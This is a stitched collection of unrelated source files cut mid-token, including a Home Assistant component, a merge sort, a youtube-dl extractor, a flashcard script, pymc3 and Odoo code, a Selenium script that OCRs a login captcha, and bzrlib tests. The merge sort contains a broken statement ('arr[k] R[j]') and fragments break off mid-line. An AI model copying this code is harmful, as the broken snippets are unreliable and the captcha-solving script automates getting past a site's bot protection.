disable=broad-except _LOGGER.error( "Unable to handle tag update event:\ %s error: %s", str(event), str(ex), ) def handle_binary_event(self, event): """Handle push notifications for binary (on/off) events.""" _LOGGER.info("Push notification for binary event arrived: %s", event) try: tag_id = event.data.get("id") event_type = event.data.get("type") mac = event.data.get("mac") dispatcher_send( self.hass, SIGNAL_BINARY_EVENT_UPDATE.format(tag_id, event_type, mac), event, ) except Exception as ex: # pylint: disable=broad-except _LOGGER.error( "Unable to handle tag binary event:\ %s error: %s", str(event), str(ex), ) def setup(hass, config): """Set up the Wireless Sensor Tag component.""" conf = config[DOMAIN] username = conf.get(CONF_USERNAME) password = conf.get(CONF_PASSWORD) try: from wirelesstagpy import WirelessTags, WirelessTagsException wirelesstags = WirelessTags(username=username, password=password) platform = WirelessTagPlatform(hass, wirelesstags) platform.load_tags() hass.data[DOMAIN] = platform except (ConnectTimeout, HTTPError, WirelessTagsException) as ex: _LOGGER.error("Unable to connect to wirelesstag.net service: %s", str(ex)) hass.components.persistent_notification.create( "Error: {}<br />" "Please restart hass after fixing this." "".format(ex), title=NOTIFICATION_TITLE, notification_id=NOTIFICATION_ID, ) return False # listen to custom events hass.bus.listen( "wirelesstag_update_tags", hass.data[DOMAIN].handle_update_tags_event ) hass.bus.listen("wirelesstag_binary_event", hass.data[DOMAIN].handle_binary_event) return True class WirelessTagBaseSensor(Entity): """Base class for HA implementation for Wireless Sensor Tag.""" def __init__(self, api, tag): """Initialize a base sensor for Wireless Sensor Tag platform.""" self._api = api self._tag = tag self._uuid = self._tag.uuid self.tag_id = self._tag.tag_id self.tag_manager_mac = self._tag.tag_manager_mac self._name = self._tag.name self._state = None @property def should_poll(self): """Return the polling state.""" return True @property def name(self): """Return the name of the sensor.""" return self._name @property def principal_value(self): """R
tannmay/Algorithms-1
Sorting/Codes/mergeSort.py
Python
gpl-3.0
1,313
0.007616
''' Python program for implementation of Merge Sort l is left index, m is middle index and r is right index L[l...m] and R[m+1.....r] are respective left and right sub-arrays ''' def merge(arr, l, m, r): n1 = m - l + 1 n2 = r-m #create temporary arrays L = [0]*(n1) R = [0]*(n2) #Copy data to temp arrays L[] and R[] for i in range(0, n1): L[i] = arr[l + i] for j in range(0, n2): R[j] = arr[m+1+j] # Merge the temp array back into arr[l...r] i = 0 # Initial index of first subarray j = 0 # Initial index of second subarray k = l # Initial index of merged subarray #Comparing the elements of the array and filling them into one array while i < n1 and j < n2 : if L[i] <= R[j] : arr[k] = L[i] i += 1 else: arr[k] = R[j] j += 1 k += 1 # Copy the remaining element of L[], if there are any while i < n1: arr[k] = L[i] i += 1 k += 1 # Copy the remaining element of R[], if there are any while j < n2: arr[k] R[j] j += 1 k += 1 # l is for left index and r is for right index of the # subarray of arr to be sorted
def mergeSort(arr, l, r): if l < r
: #Same as (l+r)/2, but avoid overflow for large l and h m = (l+(r-1))/2 # Sort first and second halves mergeSort(arr, l, m) mergeSort(arr, m+1, r) merge(arr, l, m, r)
israeltobias/DownMedia
youtube-dl/youtube_dl/extractor/go.py
Python
gpl-3.0
6,104
0.002457
# coding: utf-8 from __future__ import unicode_literals import re from .adobepass import AdobePassIE from ..utils import ( int_or_none, determine_ext, parse_age_limit, urlencode_postdata, ExtractorError, ) class GoIE(AdobePassIE): _SITE_INFO = { 'abc': { 'brand': '001', 'requestor_id': 'ABC', }, 'freeform': { 'brand': '002', 'requestor_id': 'ABCFamily', }, 'watchdisneychannel': { 'brand': '004', 'requestor_id': 'Disney', }, 'watchdisneyjunior': { 'brand': '008', 'requestor_id': 'DisneyJunior', }, 'watchdisneyxd': { 'brand': '009', 'requestor_id': 'DisneyXD', } } _VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys()) _TESTS = [{ 'url': 'http://abc.go.com/shows/castle/video/most-recent/vdka0_g86w5onx', 'info_dict': { 'id': '0_g86w5onx', 'ext': 'mp4', 'title': 'Sneak Peek: Language Arts', 'description': 'md5:7dcdab3b2d17e5217c953256af964e9c', }, 'params': { # m3u8 download 'skip_download': True, }, }, { 'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601', 'only_matching': True, }] def _real_extract(self, url): sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups() if not video_id: webpage = self._download_webpage(url, display_id) video_id = self._search_regex( # There may be inner quotes, e.g. data-video-id="'VDKA3609139'" # from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id') site_info = self._SITE_INFO[sub_domain] brand = site_info['brand'] video_data = self._download_json( 'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id), video_id)['video'][0] title = video_data['title'] formats = [] for asset in video_data.get('assets', {}).get('asset', []): asset_url = asset.get('value') if not asset_url: continue format_id = asset.get('format') ext = determine_ext(asset_url) if ext == 'm3u8': video_type = video_data.get('type') if video_type == 'lf': data = { 'video_id': video_data['id'], 'video_type': video_type, 'brand': brand, 'device': '001', } if video_data.get('accesslevel') == '1': requestor_id = site_info['requestor_id'] resource = self._get_mvpd_resource( requestor_id, title, video_id, None) auth = self._extract_mvpd_auth( url, video_id, requestor_id, resource) data.update({ 'token': auth, 'token_type': 'ap', 'adobe_requestor_id': requestor_id, }) entitlement = self._download_json( 'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json', video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers()) errors = entitlement.get('errors', {}).get('errors', []) if errors: error_message = ', '.join([error['message'] for error in errors]) raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True) asset_url += '?' + entitlement['uplynkData']['sessionKey'] formats.extend(self._extract_m3u8_formats( asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False)) else: formats.append({ 'format_id': format_id, 'url': asset_url, 'ext': ext, }) self._sort_formats(formats) subtitles = {} for cc in video_data.get('closedcaption', {}).get('src', []): cc_url = cc.get('value') if not cc_url: continue ext = determine_ext(cc_url) if ext == 'xml': ext = 'ttml' subtitles.setdefault(cc.get('lang'), []).append({ 'url': cc_url, 'ext': ext, }) thumbnails = [] for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []): thumbnail_url = thumbnail.get('value') if not thumbnail_url: continue thumbnails.append({ 'url': thumbnail_url, 'width': int_or_none(thumbnail.get('width')), 'height': int_or_none(thumbnail.get('height')), }) return { 'id': video_id, 'title': title, 'description': video_data.get('longdescription') or video_data.get('description'), 'd
uration': int_or_none(video_data.get('duration', {}).get('value'), 1000), 'age_limit': parse_age_limit(video_data.g
et('tvrating', {}).get('rating')), 'episode_number': int_or_none(video_data.get('episodenumber')), 'series': video_data.get('show', {}).get('title'), 'season_number': int_or_none(video_data.get('season', {}).get('num')), 'thumbnails': thumbnails, 'formats': formats, 'subtitles': subtitles, }
jtvaughan/oboeta
oboeta.py
Python
cc0-1.0
6,217
0.009356
#!/usr/bin/env python3 # Review Lines from the Selected Deck in Random Order Until All Pass # Written in 2012 by 伴上段 # # To the extent possible under law, the author(s) have dedicated all copyright # and related and neighboring rights to this software to the public domain # worldwide. This software is distributed without any warranty. # # You should have received a copy of the CC0 Public Domain Dedication along # with this software. If not, see # <http://creativecommons.org/publicdomain/zero/1.0/>. from argparse import * from csv import * from datetime import * from os.path import * from random import * from sys import * def Main(deckfile, logfile, commandfile, field_sep, date_format, is_dry_run, use_sm2): ret = 0 if isinstance(deckfile, str) and not exists(deckfile): stderr.write("deck file does not exist: " + deckfile + "\n") ret = 1 if not exists(logfile): stderr.write("log file does not exist: " + logfile + "\n") ret = 1 if not exists(commandfile): stderr.write("command file (pipe?) does not exist: " + commandfile + "\n") ret = 1 if ret != 0: return 1; reviewing_cards = [] failed_cards = [] deckf = None try: deckf = (open(deckfile, 'r') if isinstance(deckfile, str) else deckfile) for fields in reader(deckf, delimiter=field_sep): if len(fields) != 0: reviewing_cards.append([fields[0], field_sep.join(fields), False]) finally: if deckf is not None: deckf.close() def logreview(logf, card, command): logf.write(card[0] + field_sep + datetime.now().strftime(date_format) + field_sep + command) sm2_commands = set(str(v) + "\n" for v in range(6)) shuffle(reviewing_cards) with open(commandfile, 'r') as commandf: with open(logfile, 'a') as logf: while reviewing_cards or failed_cards: if not reviewing_cards: reviewing_cards, failed_cards = failed_cards, reviewing_cards shuffle(reviewing_cards) card = reviewing_cards.pop() stdout.write(card[1] + "\n") stdout.flush() command = commandf.readline() if use_sm2: if command in sm2_commands: if not (is_dry_run or card[-1]): logreview(logf, card, command) if int(command[0:1]) < 3: card[-1] = True failed_cards.append(card) elif command == "q\n": return 0 else: stderr.write("unrecognized command: " + command + "\n") return 2 else: # Leitner system if command == "+\n": if not (is_dry_run or card[-1]): logreview(logf, card, "+\n") elif command == "-\n": if not is_dry_run: logreview(logf, card, "-\n") card[-1] = True failed_cards.append(card) elif command.lower() == "q\n": return 0 else: stderr.write("unrecognized command: " + command + "\n") return 2 l
ogf.flush() return 0 if __name__ == "__main__": parser = ArgumentParser(formatter_class=Ra
wDescriptionHelpFormatter, description=""" Review lines from standard input as though they were flashcards and log the results. Both standard input and the specified log file must be CSV files with the same field separator character, which is specified via -s. This program works with either the Leitner system or the SuperMemo algorithm, version 2 (SM-2). formatting: This program treats the first field of each nonempty line from the deck as that line's unique ID; otherwise, this program is agnostic about formatting. New log file entries will have this format: <ID> <field-separator> <timestamp> <field-separator> <result> where <ID> is the unique ID of the line (card) associated with the record, <field-separator> is the CSV field separator, <timestamp> is the record's timestamp (you can modify its format via the -f option), and <result> is the result of the review. For Leitner-system-based reviews, <result> is either '+' or '-'. '+' indicates that the user passed the review at the specified time, whereas '-' indicates that the user failed at the specified time. For SM-2-based reviews, <result> is an integer in the range [0,5] indicating the "quality of review response" that the user provided. (0 indicates a complete memory blackout whereas 5 means the review was a piece of cake.) output: This program shuffles lines and prints them to standard output one at a time in CSV format. After printing a card, this program will wait for a command from the specified command file. Commands are single-word lines terminated by standard newline (\\n) characters. For Leitner-system-based reviews, the commands are: + the user passed the card - the user didn't pass the card q the user is terminating the quiz For SM-2-based reviews, the commands are: 0 quality of review response 0 1 quality of review response 1 2 quality of review response 2 3 quality of review response 3 4 quality of review response 4 5 quality of review response 5 q the user is terminating the quiz All other values are erroneous.""") parser.add_argument("-d", "--dry-run", default=False, action="store_true", help="don't log the results of the review") parser.add_argument("-f", "--date-format", default="%Y年%m月%d日", help="the format of dates/timestamps in the log file (uses date/strftime flags, default: %%Y年%%m月%%d日)") parser.add_argument("-s", "--field-sep", default="\t", help="the CSV field separator (default: \\t)") parser.add_argument("-2", "--use-sm2", default=False, action="store_true", help="use the SM-2 algorithm instead of the Leitner system") parser.add_argument("commandfile", help="a file (usually a named pipe) providing review commands") parser.add_argument("logfile", help="a CSV-formatted file containing records for the deck's lines") args = parser.parse_args() try: ret = Main(stdin, args.logfile, args.commandfile, args.field_sep, args.date_format, args.dry_run, args.use_sm2) except KeyboardInterrupt: ret = 0 exit(ret)
MCGallaspy/pymc3
pymc3/examples/LKJ_correlation.py
Python
apache-2.0
1,729
0.00694
from pymc3 import * import theano.tensor as t from theano.tensor.nlinalg import matrix_inverse as inv from numpy import array, diag, linspace from numpy.random import multivariate_normal # Generate some multivariate normal data: n_obs = 1000 # Mean values: mu = linspace(0, 2, num=4) n_var = len(mu) # Standard deviations: stds = np.ones(4) / 2.0 # Correlation matrix of 4 variables: corr = array([[ 1. , 0.75, 0. , 0.15], [ 0.75, 1. , -0.06, 0.19], [ 0. , -0.06, 1. , -0.04], [ 0.15, 0.19, -0.04, 1. ]]) cov_matrix = diag(stds).dot(corr.dot(diag(stds))) dataset = multivariate_normal(mu, cov_matrix, size=n_obs) # In order to convert the upper triangular correlation values to a complete # correlation matrix, we need to construct an index matrix: n_elem = n_var * (n_var - 1) / 2 tri_index = np.zeros([n_var, n_var], dtype=int) tri_index[np.triu_indices(n_var, k=1)] = np.arange(n_elem) tri_index[np.triu_indices(n_var, k=1)[::-1]] = np.arange(n_elem) with Model() as model: mu = Normal('mu', mu=0, tau=1 ** -2, shape=n_var) # We can specify separate priors for sigma and the correlation matrix: sigma = Uniform('sigma', shape=n_var) corr_triangle = LKJCorr('corr
', n=1, p=n_var) corr_matrix = corr_triangle[tri_index] corr_matrix = t.fill_diagonal(corr_matrix, 1) cov_matrix = t.diag(sigma).dot(corr_matrix.dot(t.diag(sigma))) like = MvNormal('likelihood', mu=mu, tau=inv(cov_matrix), observed=dataset) def run(n=1000): if n == "short": n = 50 with model: start = find_MAP() step = NUTS(scaling=start) tr = sample(n, step=step, start=start) if __name_
_ == '__main__': run()
prasannav7/ggrc-core
src/ggrc/models/revision.py
Python
apache-2.0
4,093
0.008063
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file> # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> # Created By: vraj@reciprocitylabs.com # Maintained By: vraj@reciprocitylabs.com """Defines a Revision model for storing snapshots.""" from ggrc import db from ggrc.models.computed_property import computed_property from ggrc.models.mixins import Base from ggrc.models.types import JsonType class Revision(Base, db.Model): """Revision object holds a JSON snapshot of the object at a time.""" __tablename__ = 'revisions' resource_id = db.Column(db.Integer, nullable=False) resource_type = db.Column(db.String, nullable=False) event_id = db.Column(db.Integer, db.ForeignKey('events.id'), nullable=False) action = db.Column(db.Enum(u'created', u'modified', u'deleted'), nullable=False) content = db.Column(JsonType, nullable=False) source_type = db.Column(db.String, nullable=True) source_id = db.Column(db.Integer, nullable=True) destination_type = db.Column(db.String, nullable=True) destination_id = db.Column(db.Integer, nullable=True) @staticmethod def _extra_table_args(_): return (db.Index('revisions_modified_by', 'modified_by_id'),) _publish_attrs = [ 'resource_id', 'resource_type', 'source_type', 'source_id', 'destination_type', 'destination_id', 'action', 'content', 'description', ] @classmethod def eager_query(cls): from sqlalchemy import orm query = super(Revision, cls).eager_query() return query.options( orm.subqueryload('modified_by'), orm.subqueryload('event'), # used in description ) def __init__(self, obj, modified_by_id, action, content): self.resource_id = obj.id self.modified_by_id = modified_by_id self.resource_type = str(obj.__class__.__name__) self.action = action self.content = content for attr in ["source_type", "source_id", "destination_type", "destination_id"]: setattr(self, attr, getattr(obj, attr, None)) def _description_mapping(self, link_objects): """Compute description for revisions with <-> in display name.""" display_name = self.cont
ent['display_name'] source, destination = display_name.split('<->')[:2] mapping_verb = "linked" if self.resource_type in link_objects else "mapped" if self.action == 'created': result = u"{1} {2} to {0}".format(source, destination, mapping_verb) elif self.action == 'deleted': result = u"{1} un{2} from {0}".format(source, destination, mapping_verb) else:
result = u"{0} {1}".format(display_name, self.action) return result @computed_property def description(self): """Compute a human readable description from action and content.""" link_objects = ['ObjectDocument'] if 'display_name' not in self.content: return '' display_name = self.content['display_name'] if not display_name: result = u"{0} {1}".format(self.resource_type, self.action) elif u'<->' in display_name: result = self._description_mapping(link_objects) else: if 'mapped_directive' in self.content: # then this is a special case of combined map/creation # should happen only for Section and Control mapped_directive = self.content['mapped_directive'] if self.action == 'created': result = u"New {0}, {1}, created and mapped to {2}".format( self.resource_type, display_name, mapped_directive ) elif self.action == 'deleted': result = u"{0} unmapped from {1} and deleted".format( display_name, mapped_directive) else: result = u"{0} {1}".format(display_name, self.action) else: # otherwise, it's a normal creation event result = u"{0} {1}".format(display_name, self.action) if self.event.action == "IMPORT": result += ", via spreadsheet import" return result
shafiquejamal/socialassistanceregistry
nr/nr/settings/testinserver.py
Python
bsd-3-clause
88
0.011364
f
rom .base import * DEBUG = True EMAIL_BACKEND = 'nr.sendmailemailbackend.EmailBackend'
lipis/the-smallest-creature
main/api/v1/song.py
Python
mit
1,226
0.006525
# coding: utf-8 from google.appengine.ext import ndb from flask.ext import restful import flask from api import helpers impo
rt auth import model import util from main import api_v1 ############################################################################### # Admin ############################################################################### @api_v1.resource('/admin/song/', endpoint='api.admin.song.list') class AdminSongListAPI(restful.Resource): @auth.admin_required def get(self): song_keys
= util.param('song_keys', list) if song_keys: song_db_keys = [ndb.Key(urlsafe=k) for k in song_keys] song_dbs = ndb.get_multi(song_db_keys) return helpers.make_response(song_dbs, model.song.FIELDS) song_dbs, song_cursor = model.Song.get_dbs() return helpers.make_response(song_dbs, model.Song.FIELDS, song_cursor) @api_v1.resource('/admin/song/<string:song_key>/', endpoint='api.admin.song') class AdminSongAPI(restful.Resource): @auth.admin_required def get(self, song_key): song_db = ndb.Key(urlsafe=song_key).get() if not song_db: helpers.make_not_found_exception('song %s not found' % song_key) return helpers.make_response(song_db, model.Song.FIELDS)
ovnicraft/server-tools
module_auto_update/tests/test_module_deprecated.py
Python
agpl-3.0
8,365
0
# -*- coding: utf-8 -*- # Copyright 2017 LasLabs Inc. # License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl). import os import mock from odoo.modules import get_module_path from odoo.tests.common import TransactionCase from odoo.tools import mute_logger from odoo.addons.module_auto_update.addon_hash import addon_hash from ..models.module_deprecated import PARAM_DEPRECATED model = 'odo
o.addons.module_auto_update.models.module' class EndTestE
xception(Exception): pass class TestModule(TransactionCase): def setUp(self): super(TestModule, self).setUp() module_name = 'module_auto_update' self.env["ir.config_parameter"].set_param(PARAM_DEPRECATED, "1") self.own_module = self.env['ir.module.module'].search([ ('name', '=', module_name), ]) self.own_dir_path = get_module_path(module_name) keep_langs = self.env['res.lang'].search([]).mapped('code') self.own_checksum = addon_hash( self.own_dir_path, exclude_patterns=['*.pyc', '*.pyo', '*.pot', 'static/*'], keep_langs=keep_langs, ) self.own_writeable = os.access(self.own_dir_path, os.W_OK) @mock.patch('%s.get_module_path' % model) def create_test_module(self, vals, get_module_path_mock): get_module_path_mock.return_value = self.own_dir_path test_module = self.env['ir.module.module'].create(vals) return test_module def test_store_checksum_installed_state_installed(self): """It should set the module's checksum_installed equal to checksum_dir when vals contain a ``latest_version`` str.""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({'latest_version': '1.0'}) self.assertEqual( self.own_module.checksum_installed, self.own_module.checksum_dir, ) def test_store_checksum_installed_state_uninstalled(self): """It should clear the module's checksum_installed when vals contain ``"latest_version": False``""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({'latest_version': False}) self.assertIs(self.own_module.checksum_installed, False) def test_store_checksum_installed_vals_contain_checksum_installed(self): """It should not set checksum_installed to False or checksum_dir when a checksum_installed is included in vals""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({ 'state': 'installed', 'checksum_installed': 'test', }) self.assertEqual( self.own_module.checksum_installed, 'test', 'Providing checksum_installed in vals did not prevent overwrite', ) def test_store_checksum_installed_with_retain_context(self): """It should not set checksum_installed to False or checksum_dir when self has context retain_checksum_installed=True""" self.own_module.checksum_installed = 'test' self.own_module.with_context( retain_checksum_installed=True, )._store_checksum_installed({'state': 'installed'}) self.assertEqual( self.own_module.checksum_installed, 'test', 'Providing retain_checksum_installed context did not prevent ' 'overwrite', ) @mock.patch('%s.get_module_path' % model) def test_button_uninstall_no_recompute(self, module_path_mock): """It should not attempt update on `button_uninstall`.""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } test_module = self.create_test_module(vals) test_module.checksum_installed = 'test' uninstall_module = self.env['ir.module.module'].search([ ('name', '=', 'web'), ]) uninstall_module.button_uninstall() self.assertNotEqual( test_module.state, 'to upgrade', 'Auto update logic was triggered during uninstall.', ) def test_button_immediate_uninstall_no_recompute(self): """It should not attempt update on `button_immediate_uninstall`.""" uninstall_module = self.env['ir.module.module'].search([ ('name', '=', 'web'), ]) try: mk = mock.MagicMock() uninstall_module._patch_method('button_uninstall', mk) mk.side_effect = EndTestException with self.assertRaises(EndTestException): uninstall_module.button_immediate_uninstall() finally: uninstall_module._revert_method('button_uninstall') def test_button_uninstall_cancel(self): """It should preserve checksum_installed when cancelling uninstall""" self.own_module.write({'state': 'to remove'}) self.own_module.checksum_installed = 'test' self.own_module.button_uninstall_cancel() self.assertEqual( self.own_module.checksum_installed, 'test', 'Uninstall cancellation does not preserve checksum_installed', ) def test_button_upgrade_cancel(self): """It should preserve checksum_installed when cancelling upgrades""" self.own_module.write({'state': 'to upgrade'}) self.own_module.checksum_installed = 'test' self.own_module.button_upgrade_cancel() self.assertEqual( self.own_module.checksum_installed, 'test', 'Upgrade cancellation does not preserve checksum_installed', ) def test_create(self): """It should call _store_checksum_installed method""" _store_checksum_installed_mock = mock.MagicMock() try: self.env['ir.module.module']._patch_method( '_store_checksum_installed', _store_checksum_installed_mock, ) vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } self.create_test_module(vals) _store_checksum_installed_mock.assert_called_once_with(vals) finally: self.env['ir.module.module']._revert_method( '_store_checksum_installed', ) @mute_logger("openerp.modules.module") @mock.patch('%s.get_module_path' % model) def test_get_module_list(self, module_path_mock): """It should change the state of modules with different checksum_dir and checksum_installed to 'to upgrade'""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } test_module = self.create_test_module(vals) test_module.checksum_installed = 'test' self.env['base.module.upgrade'].get_module_list() self.assertEqual( test_module.state, 'to upgrade', 'List update does not mark upgradeable modules "to upgrade"', ) @mock.patch('%s.get_module_path' % model) def test_get_module_list_only_changes_installed(self, module_path_mock): """It should not change the state of a module with a former state other than 'installed' to 'to upgrade'""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'uninstalled', } test_module = self.create_test_module(vals) self.env['base.module.upgrade'].get_module_list() self.assertNotEqual( test_module.state, 'to upgrade', 'List update changed state of an uninstalled module', ) def test_write(self): """It should call _store_checksum_installed method""" _store_checksum_installed_mock = mock.MagicMock() self.env['ir.module.module']._patch_method( '_store_checksum_installed', _store_checksum_installed_mock, ) vals = {'state': 'installed'} self.own_module.
alerta/python-alerta
alertaclient/commands/cmd_notes.py
Python
mit
1,034
0.004836
import json import click from tabulate import tabulate @click.command('notes', short_help='List notes') @click.option('--alert-id', '-i', metavar='UUID', help='alert IDs (can use short 8-char id)') @click.pass_obj def cli(obj, alert_id): """List notes.""" client = obj['client'] if alert_id: if obj['output'] == 'json': r = client.http.get('/alert/{}/notes'.format(alert_id)) click.echo(json.dumps(r['notes'], sort_keys=True, indent=4, ensure_ascii=False)) else: timezone = obj['timezone'] headers = { 'id': 'NOTE ID', 'text': 'NOTE', 'user': 'USER', 'type': 'TYPE', 'attributes': 'ATTRIBUTES', 'createTime': 'CREATED', 'updateTime': 'UPDATED', 'related': 'RELATED ID', 'customer': 'CUSTOMER' }
click.echo(tabulate([n.tabular(timezone) for n in client.get_alert_notes(ale
rt_id)], headers=headers, tablefmt=obj['output'])) else: raise click.UsageError('Need "--alert-id" to list notes.')
1065865483/0python_script
test/imag_test.py
Python
mit
3,355
0.001257
# -*- coding: utf-8 -*- # python+selenium识别验证码 # import re import requests import pytesseract from selenium import webdriver from PIL import Image,Image import time # driver = webdriver.Chrome() driver.maximize_window() driver.get("https://higo.flycua.com/hp/html/login.html") driver.implicitly_wait(30) # 下面用户名和密码涉及到我个人信息,所以隐藏 driver.find_element_by_name('memberId').send_keys('xxxxxx') driver.find_element_by_name('password').send_keys('xxxxxx') # 因为验证码不能一次就正确识别,我加了循环,一直识别,直到登录成功 while True:   # 清空验证码输入框,因为可能已经识别过一次了,里面有之前识别的错的验证码 driver.find_element_by_name("verificationCode").clear() # 截图或验证码图片保存地址 screenImg = "H:\s
creenImg.png" # 浏览器页面截屏 driver.get_screenshot_as_file(screenImg) # 定位验证码位置及大小 location = driver.find_element_by_name('authImage').location size = driver.find_element_by_name('authImage').size   # 下面四行我都在后面加了数字,理论上是不用加的,但是不加我这截的不是验证码那一块的图,可以看保存的截图,根据截图修改截图位置 left = location['x'] + 530
top = location['y'] + 175 right = location['x'] + size['width'] + 553 bottom = location['y'] + size['height'] + 200 # 从文件读取截图,截取验证码位置再次保存 img = Image.open(screenImg).crop((left, top, right, bottom))   # 下面对图片做了一些处理,能更好识别一些,相关处理再百度看吧 img = img.convert('RGBA') # 转换模式:L | RGB img = img.convert('L') # 转换模式:L | RGB img = Image.Contrast(img) # 增强对比度 img = img.enhance(2.0) # 增加饱和度 img.save(screenImg) # 再次读取识别验证码 img = Image.open(screenImg) code = pytesseract.image_to_string(img) # 打印识别的验证码 # print(code.strip()) # 识别出来验证码去特殊符号,用到了正则表达式,这是我第一次用,之前也没研究过,所以用的可能粗糙,请见谅 b = '' for i in code.strip(): pattern = re.compile(r'[a-zA-Z0-9]') m = pattern.search(i) if m != None: b += i # 输出去特殊符号以后的验证码 print(b) # 把b的值输入验证码输入框 driver.find_element_by_name("verificationCode").send_keys(b)   # 点击登录按钮 driver.find_element_by_class_name('login-form-btn-submit').click()   # 定时等待5秒,如果验证码识别错误,提示验证码错误需要等一会儿才能继续操作 time.sleep(5)   # 获取cookie,并把cookie转化为字符串格式 cookie1 = str(driver.get_cookies()) print(cookie1) # 第二次用正则表达式,同样有点粗糙,代码实现的功能就是看cookie里是否有tokenId这个词,如果有说明登录成功,跳出循环,可以进行后面的自动化操作,如果没有,则表示登录失败,继续识别验证码 matchObj = re.search(r'tokenId', cookie1, re.M | re.I) if matchObj: print(matchObj.group()) break else: print("No match!!") print('结束')
Distrotech/bzr
bzrlib/tests/test_bzrdir.py
Python
gpl-2.0
68,233
0.001597
# Copyright (C) 2006-2011 Canonical Ltd # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA """Tests for the BzrDir facility and any format specific tests. For interface contract tests, see tests/per_bzr_dir. """ import os import subprocess import sys from bzrlib import ( branch, bzrdir, config, controldir, errors, help_topics, lock, repository, revision as _mod_revision, osutils, remote, transport as _mod_transport, urlutils, win32utils, workingtree_3, workingtree_4, ) import bzrlib.branch from bzrlib.branchfmt.fullhistory import BzrBranchFormat5 from bzrlib.errors import ( NotBranchError, NoColocatedBranchSupport, UnknownFormatError, UnsupportedFormatError, ) from bzrlib.tests import ( TestCase, TestCaseWithMemoryTransport, TestCaseWithTransport, TestSkipped, ) from bzrlib.tests import( http_server, http_utils, ) from bzrlib.tests.test_http import TestWithTransport_pycurl from bzrlib.transport import ( memory, pathfilter, ) from bzrlib.transport.http._urllib import HttpTransport_urllib from bzrlib.transport.nosmart import NoSmartTransportDecorator from bzrlib.transport.readonly import ReadonlyTransportDecorator from bzrlib.repofmt import knitrepo, knitpack_repo class TestDefaultFormat(TestCase): def test_get_set_default_format(self): old_format = bzrdir.BzrDirFormat.get_default_format() # default is BzrDirMetaFormat1 self.assertIsInstance(old_format, bzrdir.BzrDirMetaFormat1) controldir.ControlDirFormat._set_default_format(SampleBzrDirFormat()) # creating a bzr dir should now create an instrumented dir. try: result = bzrdir.BzrDir.create('memory:///') self.assertIsInstance(result, SampleBzrDir) finally: controldir.ControlDirFormat._set_default_format(old_format) self.assertEqual(old_format, bzrdir.BzrDirFormat.get_default_format()) class DeprecatedBzrDirFormat(bzrdir.BzrDirFormat): """A deprecated bzr dir format.""" class TestFormatRegistry(TestCase): def make_format_registry(self): my_format_registry = controldir.ControlDirFormatRegistry() my_format_registry.register('deprecated', DeprecatedBzrDirFormat, 'Some format. Slower and unawesome and deprecated.', deprecated=True) my_format_registry.register_lazy('lazy', 'bzrlib.tests.test_bzrdir', 'DeprecatedBzrDirFormat', 'Format registered lazily', deprecated=True) bzrdir.register_metadir(my_format_registry, 'knit', 'bzrlib.repofmt.knitrepo.RepositoryFormatKnit1',
'Format using knits', ) my_format_registry.set_default('knit')
bzrdir.register_metadir(my_format_registry, 'branch6', 'bzrlib.repofmt.knitrepo.RepositoryFormatKnit3', 'Experimental successor to knit. Use at your own risk.', branch_format='bzrlib.branch.BzrBranchFormat6', experimental=True) bzrdir.register_metadir(my_format_registry, 'hidden format', 'bzrlib.repofmt.knitrepo.RepositoryFormatKnit3', 'Experimental successor to knit. Use at your own risk.', branch_format='bzrlib.branch.BzrBranchFormat6', hidden=True) my_format_registry.register('hiddendeprecated', DeprecatedBzrDirFormat, 'Old format. Slower and does not support things. ', hidden=True) my_format_registry.register_lazy('hiddenlazy', 'bzrlib.tests.test_bzrdir', 'DeprecatedBzrDirFormat', 'Format registered lazily', deprecated=True, hidden=True) return my_format_registry def test_format_registry(self): my_format_registry = self.make_format_registry() my_bzrdir = my_format_registry.make_bzrdir('lazy') self.assertIsInstance(my_bzrdir, DeprecatedBzrDirFormat) my_bzrdir = my_format_registry.make_bzrdir('deprecated') self.assertIsInstance(my_bzrdir, DeprecatedBzrDirFormat) my_bzrdir = my_format_registry.make_bzrdir('default') self.assertIsInstance(my_bzrdir.repository_format, knitrepo.RepositoryFormatKnit1) my_bzrdir = my_format_registry.make_bzrdir('knit') self.assertIsInstance(my_bzrdir.repository_format, knitrepo.RepositoryFormatKnit1) my_bzrdir = my_format_registry.make_bzrdir('branch6') self.assertIsInstance(my_bzrdir.get_branch_format(), bzrlib.branch.BzrBranchFormat6) def test_get_help(self): my_format_registry = self.make_format_registry() self.assertEqual('Format registered lazily', my_format_registry.get_help('lazy')) self.assertEqual('Format using knits', my_format_registry.get_help('knit')) self.assertEqual('Format using knits', my_format_registry.get_help('default')) self.assertEqual('Some format. Slower and unawesome and 